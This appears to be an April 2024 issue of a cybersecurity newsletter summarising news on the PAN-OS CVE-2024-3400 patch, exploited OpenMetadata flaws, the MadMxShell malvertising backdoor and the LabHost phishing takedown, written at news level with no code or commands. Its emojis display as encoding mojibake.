OpenMetadata Vulnerabilities Spotted

Apr 19 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s not afraid of the big, bad cyber wolf ๐Ÿบ

Itโ€™s Friday, folks, which can only mean one thingโ€ฆ Itโ€™s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโ€™s it.

Congrats, the cybercriminals are no matchโ€ฆ for your patch! ๐Ÿฉน๐Ÿฉน๐Ÿฉน

Palo Altogether now, get patching! ๐Ÿฉน

๐Ÿšจ Palo Alto Networks Releases Urgent Fixes for Critical PAN-OS Vulnerability! ๐Ÿ›ก๏ธ

Palo Alto Networks has swiftly responded to a maximum-severity security flaw impacting PAN-OS software, tracked as CVE-2024-3400, with a CVSS score of 10.0. The vulnerability, a case of command injection in the GlobalProtect feature, enables attackers to execute arbitrary code with root privileges on the firewall.

Hotfixes are available for PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, and PAN-OS 11.1.2-h3, with more patches expected soon. While Cloud NGFW firewalls are unaffected, specific PAN-OS versions and feature configurations in the cloud are vulnerable. The threat actor, known as Operation MidnightEclipse, has been exploiting this flaw to deploy payloads and execute arbitrary commands since at least March 26, 2024.

Palo Alto Networks advises users to run a CLI command for potential compromise detection and emphasises the need for immediate patching. Technical details and exploit code have been disclosed by security researchers, highlighting the urgency of securing affected systems. ๐Ÿšจ

Now, on to todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ‘จโ€๐Ÿ’ป Exploitation of OpenMetadata Vulnerabilities Spotted ๐Ÿ•ต๏ธ

  • โš ๏ธ Watch out! New Backdoor Threat Emerges on Google Ads ๐Ÿ›’

  • ๐Ÿ‘ฎ International police smash โ€˜LabHostโ€™ phishing, 37 arrested ๐Ÿš“

Itโ€™s an Open & shut case ๐Ÿ˜๐Ÿ˜๐Ÿ˜

๐Ÿšจ Urgent Alert: Exploitation of OpenMetadata Vulnerabilities Spotted ๐Ÿ›‘

Threat actors are actively exploiting critical vulnerabilities in OpenMetadata, aiming to gain unauthorised access to Kubernetes workloads and utilise them for cryptocurrency mining operations, as per the Microsoft Threat Intelligence team.

๐Ÿ”‘ OpenMetadata, an open-source metadata management platform, has become a target due to flaws discovered by security researcher Alvaro Muรฑoz, including Spring Expression Language (SpEL) injection vulnerabilities and an authentication bypass vulnerability.

๐Ÿ›ก๏ธ Successful exploitation could lead to authentication bypass and remote code execution, providing attackers with full control over the compromised systems.

๐Ÿ” Microsoft's investigation revealed a pattern where attackers target internet-exposed OpenMetadata workloads, leveraging unpatched vulnerabilities to execute code on containers running the OpenMetadata image.

๐Ÿ”ง Following initial access, threat actors conduct reconnaissance to gauge their level of access, gathering information about the environment and network configuration.

๐Ÿ” Reconnaissance often involves contacting publicly available services, such as domains associated with Interactsh, to validate network connectivity without raising suspicions.

๐Ÿ’ฐ Ultimately, attackers aim to deploy crypto-mining malware onto compromised systems, establishing persistence through cron jobs and leaving behind personal notes justifying their actions.

๐Ÿ”’ OpenMetadata users are urged to implement strong authentication methods, avoid default credentials, and ensure their images are up-to-date to mitigate these threats effectively.

๐Ÿ”ฅ This incident underscores the importance of maintaining fully patched workloads in containerized environments to prevent exploitation by malicious actors.

๐Ÿ” Additionally, publicly accessible Redis servers with disabled authentication or unpatched flaws are targeted for Metasploit Meterpreter payloads, while Docker directory search permissions vulnerabilities are also being exploited for privilege escalation purposes.

๐Ÿ’ก Staying informed and vigilant is essential in defending against evolving cyber threats.

You were only supposed to blow the bloody back doors off! ๐Ÿ™ƒ

๐Ÿšจ Google Malvertising Campaign Unveiled: New Backdoor Threat Emerges ๐Ÿ”

๐Ÿ”ฅ A fresh malvertising campaign orchestrated by threat actors has been discovered, leveraging a series of domains resembling a legitimate IP scanner software to propagate a previously undisclosed backdoor dubbed MadMxShell, according to researchers at Zscaler ThreatLabz.

๐ŸŽฏ Using a typosquatting technique, the adversaries registered multiple look-alike domains and utilised Google Ads to drive traffic to these sites, enticing victims with promises of port scanning and IT management software.

๐Ÿ”’ The malvertising campaign, active between November 2023 and March 2024, marks the first instance of a sophisticated Windows backdoor being distributed via such means, raising concerns among cybersecurity experts.

๐Ÿ’ป Upon visiting the malicious sites and attempting to download the supposed software, victims unwittingly trigger the download of a ZIP archive containing a DLL file and an executable.

๐Ÿ›ก๏ธ The executable, employing DLL side-loading, loads the DLL and initiates the infection process, injecting shellcode into the system. This process culminates in the deployment of the MadMxShell backdoor, which exhibits DNS MX query-based command-and-control communication to evade detection.

โš ๏ธ MadMxShell is equipped with various evasion techniques, including anti-dumping mechanisms, to thwart memory analysis and forensic investigations.

๐ŸŒ While the origins and motivations of the threat actors remain unclear, Zscaler researchers have identified their presence on underground forums, indicating a potential interest in perpetrating long-term malvertising campaigns.

๐Ÿ’ก Users are advised to remain vigilant, avoid downloading software from untrusted sources, and ensure their systems are equipped with up-to-date security solutions to mitigate the risks posed by such sophisticated threats.

๐Ÿ”ฅ This incident underscores the evolving tactics employed by cybercriminals to exploit legitimate platforms for malicious purposes, emphasising the need for robust cybersecurity measures and heightened awareness among users.

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Who spilled the beans to the cops? A Lab rat? ๐Ÿ’€

๐Ÿšจ Crackdown on LabHost Cybercrime Service: 37 Arrested in Global Operation ๐ŸŒ

๐Ÿ”’ Authorities from 19 countries have joined forces in a coordinated crackdown on LabHost, a notorious Phishing-as-a-Service (PhaaS) provider used by cybercriminals worldwide to pilfer personal credentials from unsuspecting victims.

๐Ÿ” LabHost, described as one of the largest PhaaS platforms, targeted banks, prominent organisations, and service providers primarily in Canada, the U.S., and the U.K., offering sophisticated phishing pages to facilitate credential theft.

๐Ÿ‘ฎโ€โ™‚๏ธ The operation, dubbed PhishOFF and Nebulae, led to the arrest of 37 individuals, including key figures behind LabHost, as well as users across the globe. Notably, arrests were made in Melbourne and Adelaide, Australia, alongside apprehensions in the U.K.

๐Ÿ’ป Europol, spearheading the initiative, disclosed that LabHost's infrastructure, along with its network of phishing sites, has been seized, dealing a significant blow to the cybercrime ecosystem.

๐Ÿ”’ LabHost, which surfaced in late 2021, boasted a vast array of phishing templates targeting popular brands globally, offering cybercriminals the tools needed to orchestrate large-scale credential theft campaigns.

๐Ÿ“ˆ Trend Micro and Group-IB shed light on the extensive reach of LabHost, emphasising its pernicious capabilities, including real-time campaign management and the pilfering of two-factor authentication codes.

๐Ÿ›ก๏ธ The takedown underscores the global law enforcement community's commitment to combating cybercrime and highlights the effectiveness of collaborative efforts in disrupting sophisticated criminal operations.

๐Ÿ’ฐ Authorities estimate LabHost received over ยฃ1 million ($1,173,000) in criminal payments, underscoring the lucrative nature of cybercrime facilitated by PhaaS platforms.

โš ๏ธ The crackdown on LabHost serves as a stark reminder of the evolving threat landscape and the need for continued vigilance and cooperation to safeguard against cyber threats.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles